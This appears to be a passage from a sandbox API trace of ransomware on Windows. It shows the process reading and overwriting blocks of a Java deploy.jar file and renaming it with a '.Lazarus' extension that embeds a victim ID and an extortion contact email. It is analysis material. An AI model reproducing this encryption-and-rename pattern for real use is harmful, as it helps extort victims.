RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46ac8 [0095.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.284] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0095.285] GetFileType (hFile=0x360) returned 0x1 [0095.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0095.285] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.286] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.286] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.286] CloseHandle (hObject=0x360) returned 1 [0095.286] AreFileApisANSI () returned 1 [0095.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46ba8 [0095.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.286] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0095.286] GetFileType (hFile=0x360) returned 0x1 [0095.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0095.286] CloseHandle (hObject=0x360) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.288] AreFileApisANSI () returned 1 [0095.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0095.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de)) returned 1 [0095.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0095.288] AreFileApisANSI () returned 1 [0095.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0095.288] GetLastError () returned 0x0 [0095.288] SetLastError (dwErrCode=0x0) [0095.288] AreFileApisANSI () returned 1 [0095.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0095.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.288] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0095.289] GetFileType (hFile=0x360) returned 0x1 [0095.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0095.289] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0095.289] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0095.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0095.292] ReadFile (in: hFile=0x360, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0095.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0095.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0095.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0095.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x954b0 [0095.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0095.294] GetLastError () returned 0x0 [0095.294] SetLastError (dwErrCode=0x0) [0095.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.294] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.294] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.295] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0095.295] CloseHandle (hObject=0x360) returned 1 [0095.296] AreFileApisANSI () returned 1 [0095.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46208 [0095.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.296] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0095.296] GetFileType (hFile=0x360) returned 0x1 [0095.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0095.296] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0095.296] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0095.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0095.298] ReadFile (in: hFile=0x360, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0095.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0095.299] GetLastError () returned 0x0 [0095.299] SetLastError (dwErrCode=0x0) [0095.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.299] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.299] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.300] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0095.300] CloseHandle (hObject=0x360) returned 1 [0095.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71550 [0095.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0095.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0095.300] AreFileApisANSI () returned 1 [0095.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x466d8 [0095.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar") returned 50 [0095.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a238, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0095.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x898f8 [0095.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a238, cbMultiByte=-1, lpWideCharStr=0x898f8, cchWideChar=112 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 112 [0095.300] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x898f8 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa11bdb26, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xaa8ed01b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4d5d7e74, dwReserved1=0xd3566e9a, cFileName="ext", cAlternateFileName="")) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0095.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0095.302] AreFileApisANSI () returned 1 [0095.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext", lpUsedDefaultChar=0x0) returned 43 [0095.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0095.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.303] AreFileApisANSI () returned 1 [0095.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0095.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x678a0 [0095.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext") returned 43 [0095.303] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.303] GetLastError () returned 0x5 [0095.303] GetLastError () returned 0x5 [0095.303] SetLastError (dwErrCode=0x5) [0095.303] GetLastError () returned 0x5 [0095.303] SetLastError (dwErrCode=0x5) [0095.303] GetLastError () returned 0x5 [0095.303] SetLastError (dwErrCode=0x5) [0095.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0095.303] AreFileApisANSI () returned 1 [0095.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0095.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x670c0 [0095.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext") returned 43 [0095.304] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.304] GetLastError () returned 0x5 [0095.304] GetLastError () returned 0x5 [0095.304] SetLastError (dwErrCode=0x5) [0095.304] GetLastError () returned 0x5 [0095.304] SetLastError (dwErrCode=0x5) [0095.304] GetLastError () returned 0x5 [0095.304] SetLastError (dwErrCode=0x5) [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0095.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0095.304] RtlAllocateHeap (HeapHandle=0x20000, 